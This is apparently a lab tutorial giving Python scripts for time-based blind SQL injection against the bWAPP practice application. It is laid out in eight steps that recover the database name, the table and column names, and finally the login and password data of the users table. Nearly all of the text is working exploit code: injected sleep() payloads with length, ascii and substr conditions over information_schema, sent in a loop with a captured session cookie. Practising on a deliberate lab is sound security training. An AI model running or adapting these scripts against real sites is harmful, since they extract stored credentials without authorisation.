Article directory
- 1. Get the database name length
- 2. Get the database name
- 3. Get the total length of the table name
- 4. Get the table name
- 5. Get the total length of the specified table column name
- 6. Get the column name of the specified table
- 7. Obtain the total length of data in the specified column of the specified table
- 8. Obtain the data in the specified column of the specified table
1. Get the database name length
The test environment is the bWAPP practice lab, page "SQL Injection – Blind – Time-Based" (sqli_15.php). Every request below injects into the `title` parameter; the page only delays its answer when the injected condition is true, and the scripts turn that delay into one bit of information per request.
```python
import requests
import time

# Session cookie captured from the browser; replace it with your own.
HEADER = {
    "Cookie": "BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security=low; PHPSESSID=i79vfbbj4l30k326ckunvitfe5; security_level=0"
}
BASE_URL = "http://127.0.0.1:9004/sqli_15.php?"


def get_database_name_length(value1, value2):
    """value1 is the injectable parameter name ("title"); value2 is the rest of the
    query string that must follow the injection (" &action=search")."""
    count = 0
    for i in range(100):
        url = BASE_URL + "{}=Man of Steel' and length(database())={} and sleep(1) -- {}".format(value1, i, value2)
        start_time = time.time()
        resp = requests.get(url, headers=HEADER)
        # print(resp.content)
        if time.time() - start_time > 1:  # only the true branch reaches sleep(1)
            print("The database length is: {}".format(i))
            count = i
            break
    return count
```
Execute statement:
```python
databaselen = get_database_name_length("title", " &action=search") + 1
```
Execution result: (screenshot not reproduced)
Tip: the parameter name `title=` and the trailing `&action=search` have to be taken from the request captured with Burp. Note the space on each side of the fragment: the comment `-- ` ends in a space, and the second argument is passed as `" &action=search"` with a leading one.
2. Get database name
```python
def get_database_name(length, value1, value2):
    """range(1, length) stops before `length`, which is why the caller passes len + 1."""
    result = ""
    for i in range(1, length):
        for j in range(127):
            url = BASE_URL + "{}=Man of Steel' and ascii(substr(database(),{},1))={} and sleep(2) -- {}".format(value1, i, j, value2)
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                print("{}:{}".format(i, j), chr(j))
                result += chr(j)
                break
    print("Database name is:", result)
    return result
```
Execute statement:
```python
database = get_database_name(databaselen, "title", " &action=search")
```
Execution result: (screenshot not reproduced)
3. Get the total length of the table name
```python
def get_table_name_length(database, value1, value2):
    """Length of the comma-separated list of all table names in `database`."""
    count = 0
    for i in range(100):
        url = BASE_URL + "{}=Man of Steel' and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'), 1))={} and sleep(1) -- {}".format(value1, database, i, value2)
        start_time = time.time()
        resp = requests.get(url, headers=HEADER)
        if time.time() - start_time > 1:
            print("The total length of the table name is: {}".format(i))
            count = i
            break
    return count
```
Execute statement:
```python
tablelen = get_table_name_length(database, "title", " &action=search") + 1
```
Execution result: (screenshot not reproduced)
4. Get table name
```python
def get_table_name(length, database, value1, value2):
    result = ""
    for i in range(1, length):
        for j in range(127):
            url = BASE_URL + "{}=Man of Steel' and ascii(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'),{},1))={} and sleep(2) -- {}".format(value1, database, i, j, value2)
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                # print("{}:{}".format(i, j), chr(j))
                result += chr(j)
                break
        print("{}:".format(i), result)
    print("Table name:", result)
    return result
```
Execute statement:
```python
get_table_name(tablelen, database, "title", " &action=search")
```
Execution result: (screenshot not reproduced)
5. Get the total length of the specified table column name
```python
def get_column_name_length(database, table, value1, value2):
    """Length of the comma-separated list of column names of `table`."""
    count = 0
    for i in range(100):
        # The last format argument must be value2 (the trailing "&action=search"),
        # not value1 as in the original listing.
        url = BASE_URL + "{}=Man of Steel' and length(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1))={} and sleep(1) -- {}".format(value1, table, database, i, value2)
        start_time = time.time()
        resp = requests.get(url, headers=HEADER)
        if time.time() - start_time > 1:
            print("The total length of column names is: {}".format(i))
            count = i
            break
    return count
```
Execute statement:
```python
columnlen = get_column_name_length(database, "users", "title", " &action=search") + 1
```
Execution result: (screenshot not reproduced)
6. Get the column name of the specified table
```python
def get_column_name(length, database, table, value1, value2):
    result = ""
    for i in range(1, length):
        for j in range(127):
            url = BASE_URL + "{}=Man of Steel' and ascii(substr(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1),{},1))={} and sleep(2) -- {}".format(value1, table, database, i, j, value2)
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                result += chr(j)
                break
        print("{}:".format(i), result)
    print("Column name:", result)
    return result
```
Execute statement:
```python
get_column_name(columnlen, database, "users", "title", " &action=search")
```
Execution result: (screenshot not reproduced)
7. Get the total length of data in the specified column of the specified table
```python
def get_data_name_length(table, username, password, value1, value2):
    """Length of group_concat(username, ':', password) over every row of `table`."""
    count = 0
    for i in range(100):
        url = BASE_URL + "{}=Man of Steel' and length(substr((select group_concat({}, ':', {}) from {}), 1))={} and sleep(1) -- {}".format(value1, username, password, table, i, value2)
        start_time = time.time()
        resp = requests.get(url, headers=HEADER)
        if time.time() - start_time > 1:
            print("The total length of column data is: {}".format(i))
            count = i
            break
    return count
```
Execute statement:
```python
datalen = get_data_name_length("users", "login", "password", "title", " &action=search") + 1
```
Execution result: (screenshot not reproduced)
8. Get the data in the specified column of the specified table
```python
def get_data_name(length, table, username, password, value1, value2):
    result = ""
    for i in range(1, length):
        for j in range(127):
            url = BASE_URL + "{}=Man of Steel' and ascii(substr((select group_concat({}, ':', {}) from {}),{},1))={} and sleep(2) -- {}".format(value1, username, password, table, i, j, value2)
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                result += chr(j)
                break
        print("{}:".format(i), result)
    print("Login data is:", result)
    return result
```
Execute statement:
```python
get_data_name(datalen, "users", "login", "password", "title", " &action=search")
```
Execution result: (screenshot not reproduced)
This approach turns out to be faster and more convenient than Burp Intruder, but from the column-name stage (step 5) onward you still have to pick the table name yourself.